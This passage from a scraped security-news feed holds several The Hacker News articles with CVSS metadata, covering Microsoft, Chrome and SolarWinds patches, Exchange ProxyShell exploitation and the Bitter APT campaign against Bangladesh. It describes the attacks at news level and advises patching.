Microsoft took the unusual step of releasing out-of-band fixes a week earlier than planned.\n\nThe ramping up of [mass exploitation](<https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/>) after Microsoft released its updates on March 2 has led the company to deploy [another series of 
security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) targeting [older and unsupported](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) cumulative updates that are vulnerable to ProxyLogon attacks.\n\nAlso included in the mix is a patch for a zero-day in Internet Explorer (CVE-2021-26411) that was found to have been exploited by North Korean hackers to [compromise security researchers](<https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html>) working on vulnerability research and development earlier this year.\n\nSouth Korean cybersecurity firm ENKI, which publicly [disclosed](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) the flaw early last month, claimed that North Korean nation-state hackers made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer.\n\nAside from these actively exploited vulnerabilities, the update also corrects a number of remote code execution (RCE) flaws in Windows DNS Server (CVE-2021-26877 and CVE-2021-26897, CVSS scores 9.8), Hyper-V server (CVE-2021-26867, CVSS score 9.9), SharePoint Server (CVE-2021-27076, CVSS score 8.8), and Azure Sphere (CVE-2021-27080, CVSS score 9.3).\n\nCVE-2021-26877 and CVE-2021-26897 are notable for a couple of reasons. 
First off, the flaws are rated as \"exploitation more likely\" by Microsoft, and are categorized as zero-click vulnerabilities of low attack complexity that require no user interaction.\n\nAccording to [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/seven-windows-wonders-critical-vulnerabilities-in-dns-dynamic-updates/>), the vulnerabilities stem from an out-of-bounds read (CVE-2021-26877) and an out-of-bounds write (CVE-2021-26897) on the heap, respectively, during the processing of [Dynamic Update](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/configure-dns-dynamic-updates-windows-server-2003>) packets, resulting in potential arbitrary reads and RCE.\n\nFurthermore, this is also the second time in a row that Microsoft has addressed a critical RCE flaw in Windows DNS Server. Last month, the company rolled out a fix for [CVE-2021-24078](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) in the same component which, if unpatched, could permit an unauthorized party to execute arbitrary code and potentially redirect legitimate traffic to malicious servers.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or select Check for Windows updates.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T05:37:00", "type": "thn", "title": "Microsoft Issues Security Patches for 89 Flaws \u2014 IE 0-Day Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24078", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26877", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27080"], "modified": "2021-08-13T09:07:37", "id": "THN:BC8A83422D35DB5610358702FCB4D154", "href": "https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:08", "description": "[](<https://thehackernews.com/images/-pOCXw5Vbz4E/YCNjQpEwYHI/AAAAAAAABuA/DON2kef7nngGbrXuKE_q5XlYxFXBjgnbQCLcBGAsYHQ/s0/microsoft-windows-update.jpg>)\n\nMicrosoft on 
Tuesday [issued fixes for 56 flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Feb>), including a critical vulnerability that's known to be actively exploited in the wild.\n\nIn all, 11 are listed as Critical, 43 are listed as Important, and two are listed as Moderate in severity \u2014 six of which are previously disclosed vulnerabilities.\n\nThe updates cover .NET Framework, Azure IoT, Microsoft Dynamics, Microsoft Edge for Android, Microsoft Exchange Server, Microsoft Office, Microsoft Windows Codecs Library, Skype for Business, Visual Studio, Windows Defender, and other core components such as Kernel, TCP/IP, Print Spooler, and Remote Procedure Call (RPC).\n\n### A Windows Win32k Privilege Escalation Vulnerability\n\nThe most critical of the flaws is a Windows Win32k privilege escalation vulnerability (CVE-2021-1732, CVSS score 7.8) that allows attackers with access to a target system to run malicious code with elevated permissions. Microsoft credited JinQuan, MaDongZe, TuXiaoYi, and LiHao of DBAPPSecurity for discovering and reporting the vulnerability.\n\nIn a separate technical write-up, the researchers said a zero-day exploit leveraging the flaw was detected in a \"very limited number of attacks\" against victims located in China by a threat actor named Bitter APT. The attacks were discovered in December 2020.\n\n\"This zero-day is a new vulnerability which caused by win32k callback, it could be used to escape the sandbox of Microsoft [Internet Explorer] browser or Adobe Reader on the latest Windows 10 version,\" DBAPPSecurity researchers [said](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>). 
\"The vulnerability is high quality and the exploit is sophisticated.\"\n\nIt's worth noting that Adobe, as part of its February patch, [addressed](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>) a critical buffer overflow flaw in Adobe Acrobat and Reader for Windows and macOS (CVE-2021-21017) that it said could lead to arbitrary code execution in the context of the current user.\n\nThe company also warned of active exploitation attempts against the bug in the wild in limited attacks targeting Adobe Reader users on Windows, mirroring the aforementioned findings from DBAPPSecurity.\n\nWhile neither Microsoft nor Adobe has provided additional details, the concurrent patching of the two flaws raises the possibility that the vulnerabilities are being chained to carry out the in-the-wild attacks.\n\n### Netlogon Enforcement Mode Goes Into Effect\n\nMicrosoft's Patch Tuesday update also resolves a number of remote code execution (RCE) flaws in Windows DNS Server (CVE-2021-24078), .NET Core, and Visual Studio (CVE-2021-26701), Microsoft Windows Codecs Library (CVE-2021-24081), and Fax Service (CVE-2021-1722 and CVE-2021-24077).\n\nThe RCE in the Windows DNS Server component is rated 9.8 for severity, making it a critical vulnerability that, if left unpatched, could permit an unauthorized adversary to execute arbitrary code and potentially redirect legitimate traffic to malicious servers.\n\nMicrosoft is also taking this month to push a second round of fixes for the [Zerologon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) flaw (CVE-2020-1472) that was originally resolved in August 2020, following which [reports of active exploitation](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) targeting unpatched systems emerged in September 2020.\n\nStarting February 9, the domain controller \"[enforcement 
mode](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>)\" will be [enabled by default](<https://support.microsoft.com/help/4557222#EnablingEnforcementMode>), thus blocking \"vulnerable [Netlogon] connections from non-compliant devices.\"\n\nIn addition, the Patch Tuesday update rectifies two information disclosure bugs \u2014 one in Edge browser for Android (CVE-2021-24100) that could have revealed personally identifiable information and payment information of a user, and the other in Microsoft Teams for iOS (CVE-2021-24114) that could have exposed the Skype token value in the preview URL for images in the app.\n\n### RCE Flaws in Windows TCP/IP Stack\n\nLastly, the Windows maker released a set of fixes affecting its TCP/IP implementation \u2014 consisting of two RCE flaws (CVE-2021-24074 and CVE-2021-24094) and one denial of service vulnerability (CVE-2021-24086) \u2014 that it said could be exploited with a DoS attack.\n\n\"The DoS exploits for these CVEs would allow a remote attacker to cause a stop error,\" Microsoft [said](<https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/>) in an advisory. \"Customers might receive a blue screen on any Windows system that is directly exposed to the internet with minimal network traffic. Thus, we recommend customers move quickly to apply Windows security updates this month.\"\n\nThe tech giant, however, noted that the complexity of the two TCP/IP RCE flaws would make it hard to develop functional exploits. 
But it expects attackers to create DoS exploits much more easily, turning the security weakness into an ideal candidate for exploitation in the wild.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or select Check for Windows updates.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-02-10T04:44:00", "type": "thn", "title": "Microsoft Issues Patches for In-the-Wild 0-day and 55 Others Windows Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-1722", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24081", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-24100", "CVE-2021-24114", "CVE-2021-26701"], "modified": "2021-02-15T11:58:01", "id": 
"THN:0C87C22B19E7073574F7BA69985A07BF", "href": "https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T02:22:45", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgx6lZB3oJ9X1sLlKCznoOeSkcDGdxDDzLpQUslIFxcqcdMH_UDcAqH4PjZiqkCxL4jI-B00Zx79nco8uEEf5XiuDqkexKPHK5G1oPT3v5UXngC8t4QHYPLfIhQTOw0d5FZR2WUXYg38_ydmYOd8biQq4tgAK_UHmsEyzslVH8sLV19IMC1QE6NMR95/s728-e100/hacker-code.jpg>)\n\nAn espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021.\n\nCybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the [Bitter APT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat>) based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.\n\n\"Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including [China](<https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations>), Pakistan, and Saudi Arabia,\" Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, [told](<https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html>) The Hacker News.\n\n\"And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise.\"\n\nBitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hacking group motivated primarily by intelligence gathering, an operation that's facilitated by means of malware such as BitterRAT, ArtraDownloader, and AndroRAT. 
Prominent targets include the energy, engineering, and government sectors.\n\nThe earliest attacks distributing the mobile version of BitterRAT date back to September 2014, with the actor having a history of leveraging zero-day flaws \u2014 [CVE-2021-1732](<https://blog.cyble.com/2021/02/24/bitter-apt-enhances-its-capability-with-windows-kernel-zero-day-exploit/>) and [CVE-2021-28310](<https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html>) \u2014 to its advantage and accomplishing its adversarial objectives.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEje8jC-uVfJtCg-HT90ER0XL1ynji-bMSmKY4TsMgVZDJ4BUis2Ee9BqhaK1IgRgN3C39Ble5vyCaoUWCWOSw_sCPSi1K1pqxhfFDtU7-XFOlKQELXIUmacfXYgeFx_YhnGNvj-1DRRGm2mRliJTxxHv8CqVxw48P0ghcuKJ0YObfTzh23rHBy_Bz3i/s728-e100/talos.jpg>)\n\nThe latest campaign, targeting an elite entity of the Bangladesh government, involves sending spear-phishing emails to high-ranking officers of the Rapid Action Battalion Unit of the Bangladesh police (RAB).\n\nAs is typically observed in other social engineering attacks of this kind, the missives are designed to lure the recipients into opening a weaponized RTF document or a Microsoft Excel spreadsheet that exploits previously known flaws in the software to deploy a new trojan dubbed \"ZxxZ.\"\n\nZxxZ, named so after a separator used by the malware when sending information back to the C2 server, is a 32-bit Windows executable compiled in Visual C++.\n\n\"The trojan masquerades as a Windows Security update service and allows the malicious actor to perform remote code execution, allowing the attacker to perform any other activities by installing other tools,\" the researchers explained.\n\nWhile the malicious RTF document exploits a memory corruption vulnerability in Microsoft Office's Equation Editor ([CVE-2017-11882](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>)), the Excel file abuses two remote code execution flaws, 
[CVE-2018-0798](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0798>) and [CVE-2018-0802](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0802>), to activate the infection sequence.\n\n\"Actors often change their tools to avoid detection or attribution, this is part of the lifecycle of a threat actor showing its capability and determination,\" Ventura said.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T12:37:00", "type": "thn", "title": "Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2022-05-12T01:27:46", "id": "THN:75586AE52D0AAF674F942498C96A2F6A", "href": 
"https://thehackernews.com/2022/05/bitter-apt-hackers-add-bangladesh-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:02", "description": "[](<https://thehackernews.com/images/-tnjJ0FH8P0I/YEwt7ddHBcI/AAAAAAAACB8/2lR87aM5jBAUOKikDOdI3SWSC9ZG92FcgCLcBGAsYHQ/s0/chrome-browser-update.jpg>)\n\nGoogle has addressed yet another actively exploited zero-day in Chrome browser, marking the second such fix released by the company within a month.\n\nThe browser maker on Friday shipped 89.0.4389.90 for Windows, Mac, and Linux, which is expected to be rolling out over the coming days/weeks to all users.\n\nWhile the update contains a total of five security fixes, the most important flaw rectified by Google concerns a [use after free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in its Blink rendering engine. The bug is tracked as CVE-2021-21193.\n\nDetails about the flaw are scarce except that it was reported to Google by an anonymous researcher on March 9.\n\nAccording to IBM, the vulnerability is rated 8.8 out of 10 on the CVSS scale, and could allow a remote attacker to execute arbitrary code on the target system. 
\"By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system,\" the report stated.\n\nAs is usually the case with actively exploited flaws, Google issued a terse statement acknowledging that an exploit for CVE-2021-21193 existed but refrained from sharing additional information until a majority of users have installed the fix, so as to prevent other threat actors from creating exploits targeting this zero-day.\n\n[](<https://thehackernews.com/images/-4e8UqaJKLag/YEwrYTe6kaI/AAAAAAAACB0/A61b0Tzs5nIymspbYAAIoURKA3zV5lE2QCLcBGAsYHQ/s0/chrome-zero-day.jpg>)\n\n\"Google is aware of reports that an exploit for CVE-2021-21193 exists in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [noted](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>) in a blog post.\n\nWith this update, Google has fixed three zero-day flaws in Chrome since the start of the year.\n\nEarlier this month, the company issued a fix for an \"object lifecycle issue in audio\" (CVE-2021-21166) which it said was being actively exploited. Then on February 4, the company resolved another actively exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine.\n\nChrome users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.\n
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-13T03:16:00", "type": "thn", "title": "Another Google Chrome 0-Day Bug Found Actively Exploited In-the-Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193"], "modified": "2021-03-16T04:51:58", "id": "THN:15BF409706D7240A5276C705732D745F", "href": "https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:24", "description": "[](<https://thehackernews.com/images/-GFgjq7qp1cE/YF1q7HbWVxI/AAAAAAAACGg/dV7zI2KVO_c_JeEBnNPbQvFkpEb9fJqrQCLcBGAsYHQ/s0/solarwinds-orion-vulnerability.jpg>)\n\nIT infrastructure management provider SolarWinds on Thursday released a new update to its Orion network monitoring tool with fixes for four security vulnerabilities, 
counting two weaknesses that could be exploited by an authenticated attacker to achieve remote code execution (RCE).\n\nChief among them is a JSON deserialization flaw that allows an authenticated user to execute arbitrary code via the [test alert actions](<https://documentation.solarwinds.com/en/Success_Center/orionplatform/content/core-testing-alerts-sw1106.htm>) feature available in the Orion Web Console, which lets users simulate network events (e.g., an unresponsive server) that can be configured to trigger an alert during setup. It has been rated critical in severity.\n\nA second issue concerns a high-risk vulnerability that could be leveraged by an adversary to achieve RCE in the Orion Job Scheduler. \"In order to exploit this, an attacker first needs to know the credentials of an unprivileged local account on the Orion Server,\" SolarWinds [said](<https://documentation.solarwinds.com/en/Success_Center/orionplatform/Content/Release_Notes/Orion_Platform_2020-2-5_release_notes.htm>) in its release notes.\n\nThe advisory is light on technical specifics, but the two shortcomings are said to have been reported via Trend Micro's Zero Day Initiative.\n\n[](<https://thehackernews.com/images/-7aYws8KQwm4/YF1na64c3wI/AAAAAAAACGY/2xeUC0p9gpMkjpH1IOa2yeICs00934H0gCLcBGAsYHQ/s0/cve.jpg>)\n\nBesides the aforementioned two flaws, the update squashes two other bugs, including a high-severity stored cross-site scripting (XSS) vulnerability in the \"add custom tab\" within customize view page (CVE-2020-35856) and a reverse tabnabbing and open redirect vulnerability in the custom menu item options page (CVE-2021-3109), both of which require an Orion administrator account for successful exploitation.\n\nThe new update also brings a number of security improvements, with fixes for preventing XSS attacks and enabling UAC protection for Orion database manager, among others.\n\nThe latest round of fixes arrives almost two months after the Texas-based company addressed [two severe 
security vulnerabilities](<https://thehackernews.com/2021/02/3-new-severe-security-vulnerabilities.html>) impacting Orion Platform (CVE-2021-25274 and CVE-2021-25275), which could have been exploited to achieve remote code execution with elevated privileges.\n\nOrion users are recommended to update to the latest release, \"Orion Platform 2020.2.5,\" to mitigate the risk associated with the security issues.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-26T05:07:00", "type": "thn", "title": "Another Critical RCE Flaw Discovered in SolarWinds Orion Platform", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35856", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-3109"], "modified": "2021-03-26T05:07:54", "id": "THN:1628F014C29F23FB8C8FF7EBC7ADC137", "href": 
"https://thehackernews.com/2021/03/solarwinds-orion-vulnerability.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[](<https://thehackernews.com/images/-4bW5O7qDy3g/YRY939zQM4I/AAAAAAAADho/RUV3iIGj654Ml8xKhGo8MXIEWtGwsL1ywCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nThreat actors are actively carrying out opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using a new exploit chain leveraging a trio of flaws affecting on-premises installations, making them the latest set of bugs after ProxyLogon vulnerabilities were exploited en masse at the start of the year.\n\nThe remote code execution flaws have been collectively dubbed \"ProxyShell.\" At least 30,000 machines are affected by the vulnerabilities, [according](<https://isc.sans.edu/diary/27732>) to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center.\n\n\"Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,\" NCC Group's Richard Warren [tweeted](<https://twitter.com/buffaloverflow/status/1425831100157349890>), noting that one of the intrusions resulted in the deployment of a \"C# aspx webshell in the /aspnet_client/ directory.\"\n\nPatched in early March 2021, [ProxyLogon](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) is the moniker for CVE-2021-26855, a server-side request forgery vulnerability in Exchange Server that permits an attacker to take control of a vulnerable server as an administrator, and which can be chained with another post-authentication arbitrary-file-write vulnerability, CVE-2021-27065, to achieve code execution.\n\nThe vulnerabilities came to light after Microsoft [spilled the beans](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) 
on a Beijing-sponsored hacking operation that leveraged the weaknesses to strike entities in the U.S. for purposes of exfiltrating information in what the company described as limited and targeted attacks.\n\nSince then, the Windows maker has fixed six more flaws in its mail server component, two of which are called [ProxyOracle](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-2-ProxyOracle/>), which enables an adversary to recover the user's password in plaintext format.\n\nThree other issues \u2014 known as ProxyShell \u2014 could be abused to bypass ACL controls, elevate privileges on Exchange PowerShell backend, effectively authenticating the attacker and allowing for remote code execution. Microsoft noted that both CVE-2021-34473 and CVE-2021-34523 were inadvertently omitted from publication until July.\n\n**ProxyLogon:**\n\n * [**CVE-2021-26855**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-26857**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-26858**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-27065**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n\n**ProxyOracle:**\n\n * [**CVE-2021-31195**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on May 11)\n * [**CVE-2021-31196**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196>) \\- Microsoft Exchange Server Remote Code Execution 
Vulnerability (Patched on July 13)\n\n**ProxyShell:**\n\n * [**CVE-2021-31207**](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) \\- Microsoft Exchange Server Security Feature Bypass Vulnerability (Patched on May 11)\n * [**CVE-2021-34473**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on April 13, advisory released on July 13)\n * [**CVE-2021-34523**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on April 13, advisory released on July 13)\n\n**Other:**\n\n * [**CVE-2021-33768**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33768>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability (Patched on July 13)\n\nOriginally demonstrated at the [Pwn2Own hacking competition](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) this April, technical details of the ProxyShell attack chain were disclosed by DEVCORE researcher Orange Tsai at the [Black Hat USA 2021](<https://www.blackhat.com/us-21/briefings/schedule/index.html#proxylogon-is-just-the-tip-of-the-iceberg-a-new-attack-surface-on-microsoft-exchange-server-23442>) and [DEF CON](<https://www.youtube.com/watch?v=5mqid-7zp8k>) security conferences last week. To prevent exploitation attempts, organizations are highly recommended to install updates released by Microsoft.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-13T09:46:00", "type": "thn", "title": "Hackers Actively Searching for Unpatched Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31207", "CVE-2021-33768", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-13T09:46:09", "id": "THN:FA40708E1565483D14F9A31FC019FCE1", "href": "https://thehackernews.com/2021/08/hackers-actively-searching-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:16", "description": "[](<https://thehackernews.com/images/-eih1k3cYVhA/YI-naR8atLI/AAAAAAAACbU/NvYXtTt5zpkVcilfqrwOd5oadfGSEyNuQCLcBGAsYHQ/s0/hacking.jpg>)\n\nA threat actor believed to be working on behalf of Chinese 
